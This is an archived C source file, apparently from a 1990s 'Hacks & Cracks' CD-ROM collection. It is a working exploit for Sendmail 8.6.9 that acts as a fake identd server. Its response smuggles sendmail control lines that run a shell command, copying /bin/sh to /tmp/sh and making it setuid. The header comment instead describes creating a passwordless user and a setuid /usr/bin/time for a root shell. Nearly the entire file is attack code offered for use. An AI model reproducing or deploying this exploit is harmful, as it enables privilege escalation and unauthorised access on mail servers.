home
***
CD-ROM
|
disk
|
FTP
|
other
***
search
/
Hacks & Cracks
/
Hacks_and_Cracks.iso
/
hackersclub
/
km
/
downloads
/
c_scripts
/
sm869.c
< prev
next >
Wrap
C/C++ Source or Header
|
1998-03-25
|
2KB
|
57 lines
/* Sendmail 8.6.9 identd hack. */
#include <stdio.h>
#include <sys/types.h>
#include <sys/fcntl.h>
#include <sys/time.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#define OUTPUT_BUFFER 2048 /* Output and input, */
#define SOCKET_BUFFER 100 /* with which we must up-put */
/* The commands to send... This particular string tells the machine
to create a user named funkzor, with a null password, uid of 999,
and gid of 100. It then instructs the machine to change /usr/bin/time
to mode 6777, which makes it setuid. Once you login to the machine
(as funkzor) just type /usr/bin/time sh, and you will have a bin-owned
shell. (perhaps root... if you're lucky)
*/
#define EVIL_COMMAND "root\r\nCroot\r\nMprog, P=/bin/sh, F=lsDFMeu, A=sh -c $u\r\n<\"|/bin/cp /bin/sh /tmp/sh ; chmod 7777 /tmp/sh\">\r\n$rascii"
void main()
{
struct fd_set fdesc; /* File descriptor structure */
char outbuf[OUTPUT_BUFFER]; /* Our output buffer */
char inbuf[SOCKET_BUFFER]; /* "" input "" */
/* Preparing to read incoming data, captain. */
FD_ZERO(&fdesc);
FD_SET(0, &fdesc);
/* Read it, Sulu! Now! */
if(read(0, inbuf, SOCKET_BUFFER - 1)<=0)
exit(1);
FD_SET(0, &fdesc);
/* to remove the /r/n at the end of inbuf */
if(inbuf[strlen(inbuf)-2]==13 || inbuf[strlen(inbuf)-2]==10)
inbuf[strlen(inbuf)-2]=0;
else
inbuf[strlen(inbuf)-1]=0;
/* Now we send our instructions, under the guise of innocent
* ol' identd. I find this ironic, that identd, supposedly
* a standard that would help stop "evil hacker types", became
* part of one of the bigger holes to ever hit the net. Hmm.
* Ain't life funny that way sometimes? :)
*/
sprintf(outbuf, "%s : USERID : UNIX : %s\r\n", inbuf, EVIL_COMMAND);
write(1, outbuf, strlen(outbuf));
exit(0);
}